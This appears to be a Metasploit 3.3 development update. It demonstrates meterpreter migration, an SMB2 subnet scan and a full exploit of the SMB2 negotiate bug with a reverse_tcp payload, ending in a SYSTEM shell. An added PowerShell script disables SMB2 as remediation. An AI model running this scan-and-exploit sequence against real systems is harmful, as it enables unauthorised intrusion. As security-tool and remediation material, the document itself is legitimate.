
Metasploit 3.3 Development Updates

meterpreter > ps

Process list
============

 PID   Name           Path
 ---   ----           ----
 204   iexplore.exe   C:\Program Files\Internet Explorer\iexplore.exe
 [ snipped ]
 1736  Explorer.EXE   C:\WINDOWS\Explorer.EXE
 3348  sol.exe        C:\WINDOWS\system32\sol.exe

meterpreter > migrate 1736
[*] Migrating to 1736...
[*] Migration completed successfully.
meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.

[Screenshot: http://2.bp.blogspot.com/_zhDBubx8Wns/SsA_4shJItI/AAAAAAAAAHo/Njt1RnUCojg/s1600-h/woot.png]

msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours

When using Metasploit on Windows XP, socket restrictions prevent the scanner modules from running at full speed. If you need to use the scanning modules inside Metasploit on Windows, we recommend any version other than XP (2000, Vista, 7). Alternatively, boot the BackTrack 4 virtual machine in VMware.

Now that we have identified two systems with SMB2 enabled, it's exploit time!

msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS      : Windows 2008 (Build 6001, Service Pack 1).
Arch    : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Voila! A great way to justify disabling SMB2 across your network.
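The post's conclusion is that SMB2 should be turned off on hosts that serve it while they remain exposed. The following is an added example, not code from the Metasploit post: it audits and optionally disables the SMB2 server protocol on a Vista/Server 2008-era host through the LanmanServer "SMB2" registry value, which is Microsoft's documented workaround for this exposure (0 disables SMB2; a missing or non-zero value leaves it enabled). The function names are the example's own, and it assumes an elevated PowerShell prompt on the host being checked.

```powershell
# Added example (not from the Metasploit post): audit and, when asked, disable
# SMB2 serving via the LanmanServer "SMB2" registry value. Run elevated.

$SmbParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb2ServerState {
    # Reads the SMB2 value; $null means it has never been set, which Windows
    # treats as "enabled", so only an explicit 0 counts as disabled.
    $value = (Get-ItemProperty -Path $SmbParams -Name 'SMB2' -ErrorAction SilentlyContinue).SMB2
    [pscustomobject]@{
        ComputerName  = $env:COMPUTERNAME
        RegistryValue = $value
        Smb2Enabled   = ($null -eq $value) -or ($value -ne 0)
    }
}

function Disable-Smb2Server {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Set LanmanServer SMB2 = 0')) {
        Set-ItemProperty -Path $SmbParams -Name 'SMB2' -Type DWord -Value 0
        # The new value is only read when the Server service starts, so restart
        # it (with its dependents) rather than leaving the window open until
        # the next reboot.
        Restart-Service -Name LanmanServer -Force
        Get-Smb2ServerState
    }
}

# Usage: audit first; preview the change with -WhatIf before applying it.
Get-Smb2ServerState | Format-List
# Disable-Smb2Server -WhatIf
# Disable-Smb2Server
```

On Windows 8 / Server 2012 and later the same switch is exposed as Set-SmbServerConfiguration -EnableSMB2Protocol $false, and Get-SmbServerConfiguration reports the current state. Disabling SMB2 pushes clients back to SMB1 for that host, so the scanner results above are best used as a remediation list to patch against, with the registry change as the stopgap for hosts that cannot be patched immediately.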

C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev
